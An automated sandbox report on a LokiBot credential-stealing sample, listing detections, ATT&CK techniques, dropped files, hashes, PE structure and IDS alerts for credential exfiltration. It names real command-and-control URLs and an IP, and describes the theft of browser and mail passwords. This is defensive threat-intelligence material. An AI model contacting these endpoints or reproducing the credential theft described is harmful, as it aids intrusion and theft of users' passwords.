Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: PopPassword
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | Code function: SmtpPassword
Source: C:\Users\user\Desktop\kVijllv0Yl.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match, File source: Process Memory Space: kVijllv0Yl.exe PID: 1292, type: MEMORYSTR
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.kVijllv0Yl.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.2.kVijllv0Yl.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.kVijllv0Yl.exe.1ade0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 1.0.kVijllv0Yl.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000001.00000000.350551294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000000.347539730.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.361757781.000000001ADE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000000.349125284.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: kVijllv0Yl.exe PID: 2312, type: MEMORYSTR
          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts11
          Native API
          Path Interception1
          Access Token Manipulation
          1
          Deobfuscate/Decode Files or Information
          2
          OS Credential Dumping
          1
          Account Discovery
          Remote Services1
          Archive Collected Data
          Exfiltration Over Other Network Medium1
          Ingress Tool Transfer
          Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts111
          Process Injection
          2
          Obfuscated Files or Information
          2
          Credentials in Registry
          2
          File and Directory Discovery
          Remote Desktop Protocol2
          Data from Local System
          Exfiltration Over Bluetooth1
          Encrypted Channel
          Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Software Packing
          Security Account Manager5
          System Information Discovery
          SMB/Windows Admin Shares1
          Email Collection
          Automated Exfiltration2
          Non-Application Layer Protocol
          Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Masquerading
          NTDS11
          Security Software Discovery
          Distributed Component Object Model1
          Clipboard Data
          Scheduled Transfer112
          Application Layer Protocol
          SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
          Virtualization/Sandbox Evasion
          LSA Secrets11
          Virtualization/Sandbox Evasion
          SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          Access Token Manipulation
          Cached Domain Credentials1
          System Owner/User Discovery
          VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items111
          Process Injection
          DCSync1
          Remote System Discovery
          Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Source | Detection | Scanner | Label
          kVijllv0Yl.exe | 40% | Virustotal | -
          kVijllv0Yl.exe | 48% | ReversingLabs | Win32.Backdoor.Androm
          kVijllv0Yl.exe | 100% | Joe Sandbox ML | -

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Temp\nsg69F4.tmp\xfmkprutvpn.dll | 28% | Virustotal | -

          Source | Detection | Scanner | Label
          1.0.kVijllv0Yl.exe.400000.3.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          1.0.kVijllv0Yl.exe.400000.1.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          1.0.kVijllv0Yl.exe.400000.9.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          0.2.kVijllv0Yl.exe.1ade0000.3.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.2.kVijllv0Yl.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.0.kVijllv0Yl.exe.400000.8.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.0.kVijllv0Yl.exe.400000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.0.kVijllv0Yl.exe.400000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen2
          1.0.kVijllv0Yl.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.0.kVijllv0Yl.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.0.kVijllv0Yl.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          1.0.kVijllv0Yl.exe.400000.2.unpack | 100% | Avira | TR/Patched.Ren.Gen2

          Source | Detection | Scanner | Label
          secure01-redirect.net | 22% | Virustotal | -

          Source | Detection | Scanner | Label
          http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe
          http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe
          http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe
          http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe
          http://www.ibsensoftware.com/ | 0% | URL Reputation | safe
          http://secure01-redirect.net/gc15/fre.php | 19% | Virustotal | -
          http://secure01-redirect.net/gc15/fre.php | 100% | Avira URL Cloud | malware
          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          secure01-redirect.net | 185.185.69.76 | true | true | - | unknown

          Name | Malicious | Antivirus Detection | Reputation
          http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
          http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
          http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
          http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown
          http://secure01-redirect.net/gc15/fre.php | true | 19% Virustotal; Avira URL Cloud: malware | unknown

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://nsis.sf.net/NSIS_Error | kVijllv0Yl.exe | false | - | high
          http://nsis.sf.net/NSIS_ErrorError | kVijllv0Yl.exe | false | - | high
          http://www.ibsensoftware.com/ | kVijllv0Yl.exe, kVijllv0Yl.exe, 00000001.00000000.346477507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, kVijllv0Yl.exe, 00000001.00000002.602834721.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              IP | Domain | Country | ASN | ASN Name | Malicious
              185.185.69.76 | secure01-redirect.net | Russian Federation | 35278 | SPRINTHOSTRU | true
              IP
              192.168.2.1
              Joe Sandbox Version:34.0.0 Boulder Opal
              Analysis ID:562515
              Start date:28.01.2022
              Start time:23:36:03
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 5m 58s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:kVijllv0Yl (renamed file extension from none to exe)
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:21
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.spyw.evad.winEXE@3/6@35/2
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 77.4% (good quality ratio 74.7%)
              • Quality average: 77.1%
              • Quality standard deviation: 28%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
              • HTTP Packets have been reduced
              • TCP Packets have been reduced to 100
              • Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200
              • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, www.bing.com, client.wns.windows.com, fs.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, dual-a-0001.a-msedge.net, www-bing-com.dual-a-0001.a-msedge.net, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
              • Not all processes were analyzed, report is missing behavior information
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              Time | Type | Description
              23:37:15 | API Interceptor | 32x Sleep call for process: kVijllv0Yl.exe modified
              Process:C:\Users\user\Desktop\kVijllv0Yl.exe
              File Type:data
              Category:dropped
              Size (bytes):269906
              Entropy (8bit):7.658711659128666
              Encrypted:false
              SSDEEP:6144:uuOB0r1H5NPCb6yTo0bS2IBEnEwikp46NNVGtf6uGfZghuUYtDw:tr1XaeS0xw5XNVGx0xjH
              MD5:3E44A21AFF425B74994D8A28FFF9B23E
              SHA1:1654662D1C4F390E994D4C858D8B820FE651605C
              SHA-256:8D848BF31B17F081AAFA0AA4535767365C8CC518A8A434776733A06DE10921C9
              SHA-512:AFD4358FCA881DE6C7587C407FC66014FD5A6EB1E3DB604CBBA7F53766141C2C0CC170A0D8B7C066169BC14EFA805A9725FE18A89B6C7A4967DE61E80D941E07
              Malicious:false
              Reputation:low
              Process:C:\Users\user\Desktop\kVijllv0Yl.exe
              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):20992
              Entropy (8bit):5.749135787820481
              Encrypted:false
              SSDEEP:384:Yb6PUQ1aldbpD3HXY0QmwiEiTIYKopaZUb6xhbotKb:YbG1albrXY0HwinMdZeUhbogb
              MD5:C91E53F1A792E1F98CAE5FAF1B3324BD
              SHA1:4CD46871507173B3B4EAB34A2885E76E4D60E32A
              SHA-256:2F51361FFE7DC60A4088469A27E570F22CF655E87720D26626B4E257492739E9
              SHA-512:25AC355D4FB8DD503921B62AA5F869C5805F6909C7079633B5EB4BE9C6094B708D216786AA8D025712558745AEF13A7F3F9FEFA7D5C82BEA44957737E954176C
              Malicious:true
              Antivirus:
              • Antivirus: Virustotal, Detection: 28%, Browse
              Reputation:low
              Process:C:\Users\user\Desktop\kVijllv0Yl.exe
              File Type:data
              Category:dropped
              Size (bytes):4967
              Entropy (8bit):6.171281725061639
              Encrypted:false
              SSDEEP:96:NPyed2g5U8YofB+TCC1CTHLBiA5CECh5+AU+P6dOuG3xiuoggvX3K:hyyzPfGVCTHLBiA5Ctf+AU+PI1GwuorK
              MD5:6A777038ED583DD539A48B85A672378F
              SHA1:2B24614BD0F041619CBEA3AC3DFCE400C0A7A30B
              SHA-256:D15DA5D9FC537DA388F115A3E951FC44CCD30BB62B0F9131EE1F1B42C8B70413
              SHA-512:48C0BB9A6873B022F561C77BA69C769BB9352CF02B476FFCBB63A14EC8F554FCDA792EFD7203650ABB2877D3E0D4CEF3FA1EF5D46BBD9A5C3ECE002F30257B6E
              Malicious:false
              Reputation:low
              Process:C:\Users\user\Desktop\kVijllv0Yl.exe
              File Type:data
              Category:dropped
              Size (bytes):218255
              Entropy (8bit):7.988008060500998
              Encrypted:false
              SSDEEP:6144:N0r1H5NPCb6yTo0bS2IBEnEwikp46NNVGtf6uGfZghuUe:ur1XaeS0xw5XNVGx0xjV
              MD5:4ABFD766D3D71773430A02F9CDDC33B2
              SHA1:D623A96E0F04A04CB73F632D89263513AB9EA5E4
              SHA-256:5F335EA5F3D9C2FC3E21CAA50C960EEE648BA5988D99490DA32F9A6A4009EEE6
              SHA-512:BD6A540D1884FFCAB7BFE760480474C2BB329F803A413BD143126A66F8184E5566830E4F09BA07F8E24C4476FD5556487519FDC8D73499EE239A1B94E82A0366
              Malicious:false
              Reputation:low
              Process:C:\Users\user\Desktop\kVijllv0Yl.exe
              File Type:very short file (no magic)
              Category:dropped
              Size (bytes):1
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:U:U
              MD5:C4CA4238A0B923820DCC509A6F75849B
              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
              Malicious:false
              Reputation:high, very likely benign file
              Preview:1
              Process:C:\Users\user\Desktop\kVijllv0Yl.exe
              File Type:data
              Category:dropped
              Size (bytes):49
              Entropy (8bit):1.2701062923235522
              Encrypted:false
              SSDEEP:3:/l1PL3n:fPL3
              MD5:CD8FA61AD2906643348EEF98A988B873
              SHA1:0B10E2F323B5C73F3A6EA348633B62AE522DDF39
              SHA-256:49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
              SHA-512:1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
              Malicious:false
              Preview:........................................user.
              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.9269620673373185
              TrID:
              • Win32 Executable (generic) a (10002005/4) 92.16%
              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:kVijllv0Yl.exe
              File size:247353
              MD5:6997de404fb7e798aecc2c8a14fd2f12
              SHA1:121a437542ba544f975847429dda439719800bb9
              SHA256:f36a543cfcddf76b99df925bf70b22d560792d1059387e00bfe782bffd6e8a2b
              SHA512:bb3fe544bdf9770bbb9864d9e14daa68d8357a91d06f33f90b7165467c608b9a2fd46009b37f4d914112d18acceaaa1cd3e2df92db65ec0f1bc20b41a020faa5
              SSDEEP:3072:oNyah0mJo4m2pkC3Z4FRH8aVAW3dxaj0ubNDHgJiLwYePSCfPrpAfZSQme11lz:owkZN3KRHXA0ajnHXYPbfjKxce1bz
              Icon Hash:b2a88c96b2ca6a72
              Entrypoint:0x403225
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x48EFCDC9 [Fri Oct 10 21:48:57 2008 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:099c0646ea7282d232219f8807883be0
              Instruction
              sub esp, 00000180h
              push ebx
              push ebp
              push esi
              xor ebx, ebx
              push edi
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 00409128h
              xor esi, esi
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [00407030h]
              push 00008001h
              call dword ptr [004070B4h]
              push ebx
              call dword ptr [0040727Ch]
              push 00000008h
              mov dword ptr [00423F58h], eax
              call 00007F4D3C573CD0h
              mov dword ptr [00423EA4h], eax
              push ebx
              lea eax, dword ptr [esp+34h]
              push 00000160h
              push eax
              push ebx
              push 0041F450h
              call dword ptr [00407158h]
              push 004091B0h
              push 004236A0h
              call 00007F4D3C573987h
              call dword ptr [004070B0h]
              mov edi, 00429000h
              push eax
              push edi
              call 00007F4D3C573975h
              push ebx
              call dword ptr [0040710Ch]
              cmp byte ptr [00429000h], 00000022h
              mov dword ptr [00423EA0h], eax
              mov eax, edi
              jne 00007F4D3C57119Ch
              mov byte ptr [esp+14h], 00000022h
              mov eax, 00429001h
              push dword ptr [esp+14h]
              push eax
              call 00007F4D3C573468h
              push eax
              call dword ptr [0040721Ch]
              mov dword ptr [esp+1Ch], eax
              jmp 00007F4D3C5711F5h
              cmp cl, 00000020h
              jne 00007F4D3C571198h
              inc eax
              cmp byte ptr [eax], 00000020h
              je 00007F4D3C57118Ch
              cmp byte ptr [eax], 00000022h
              mov byte ptr [eax+eax+00h], 00000000h
              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804
              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | -
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x73a4 | 0xb4 | .rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x2c000 | 0x900 | .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | -
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | -
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | -
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | -
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
              IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x28c | .rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | -
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              .text | 0x1000 | 0x5976 | 0x5a00 | False | 0.668619791667 | data | 6.46680044621 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
              .rdata | 0x7000 | 0x1190 | 0x1200 | False | 0.444878472222 | data | 5.17796812871 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data | 0x9000 | 0x1af98 | 0x400 | False | 0.55078125 | data | 4.68983486809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
              .ndata | 0x24000 | 0x8000 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .rsrc | 0x2c000 | 0x900 | 0xa00 | False | 0.409375 | data | 3.94693169534 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              Name | RVA | Size | Type | Language | Country
              RT_ICON | 0x2c190 | 0x2e8 | data | English | United States
              RT_DIALOG | 0x2c478 | 0x100 | data | English | United States
              RT_DIALOG | 0x2c578 | 0x11c | data | English | United States
              RT_DIALOG | 0x2c698 | 0x60 | data | English | United States
              RT_GROUP_ICON | 0x2c6f8 | 0x14 | data | English | United States
              RT_MANIFEST | 0x2c710 | 0x1eb | XML 1.0 document, ASCII text, with very long lines, with no line terminators | English | United States
              DLL | Import
              KERNEL32.dll | CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetFileTime, GetTempPathA, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetWindowsDirectoryA
              USER32.dll | EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
              GDI32.dll | SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
              SHELL32.dll | SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
              ADVAPI32.dll | RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
              COMCTL32.dll | ImageList_AddMasked, ImageList_Destroy, ImageList_Create
              ole32.dll | CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
              VERSION.dll | GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

              Language of compilation system | Country where language is spoken
              English | United States
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/28/22-23:37:07.260369 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49769 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:07.260369 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49769 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:07.260369 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49769 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:07.260369 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49769 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:10.277966 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49770 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:10.277966 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49770 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:10.277966 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49770 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:10.277966 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49770 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:14.709347 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49771 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:14.709347 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49771 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:14.709347 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49771 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:14.709347 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49771 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:16.117797 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49771 | 185.185.69.76 | 192.168.2.6
01/28/22-23:37:17.458669 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49773 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:17.458669 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49773 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:17.458669 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49773 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:17.458669 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49773 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:18.890584 | TCP | 2025483 | ET TROJAN LokiBot Fake 404 Response | 80 | 49773 | 185.185.69.76 | 192.168.2.6
01/28/22-23:37:20.261992 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49774 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:20.261992 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49774 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:20.261992 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49774 | 80 | 192.168.2.6 | 185.185.69.76
01/28/22-23:37:20.261992 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49774 | 80 | 192.168.2.6 | 185.185.69.76
